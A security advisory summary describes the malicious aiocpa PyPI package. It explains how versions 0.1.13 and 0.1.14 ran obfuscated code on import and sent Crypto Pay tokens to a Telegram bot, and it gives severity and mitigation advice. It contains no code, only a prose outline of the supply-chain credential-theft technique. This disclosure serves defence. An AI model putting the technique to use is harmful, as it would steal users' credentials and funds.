GHSA-486g-47cc-8wxf: 
Python vulnerability analysis and mitigation

The aiocpa package, a Python library for generating color gradients of text, was found to contain malicious code in versions 0.1.13 and 0.1.14. The vulnerability was discovered on November 21, 2024, and was assigned identifier GHSA-486g-47cc-8wxf. The malicious code was introduced in version 0.1.13 and persisted through version 0.1.14, after which all versions were removed from PyPI (PyPI Blog, GitHub Advisory).

The vulnerability involved highly obfuscated code that was automatically executed when the module was imported. The malicious code was wrapped in 50 layers of obfuscation, using techniques like byte-encoding, compression, and reversals. When executed, it would override the constructor for the main client class and forward client credentials to a configured Telegram bot endpoint. The vulnerability has a CVSS v4 base score of 8.3 (High severity), with local attack vector, low attack complexity, and high impact on both confidentiality and integrity (PyPI Blog, GitHub Advisory).

The malware targeted Crypto Pay users by harvesting and exfiltrating sensitive credentials including tokens, API servers, and other Crypto Pay-related data to a remote Telegram bot. The potential impact includes unauthorized access to crypto wallets and possible financial losses, though the extent of actual exploitation is unknown (PyPI Blog).

All versions of aiocpa have been removed from PyPI. Users who have installed any version of aiocpa should immediately audit their usage of the library and consider alternatives. It is recommended to implement additional protections such as outbound network firewalls to monitor or prevent network calls to unknown destinations. Users should also consider pinning their dependencies and versions, and use hashes to prevent unwanted updates to existing package/version constraints (PyPI Blog).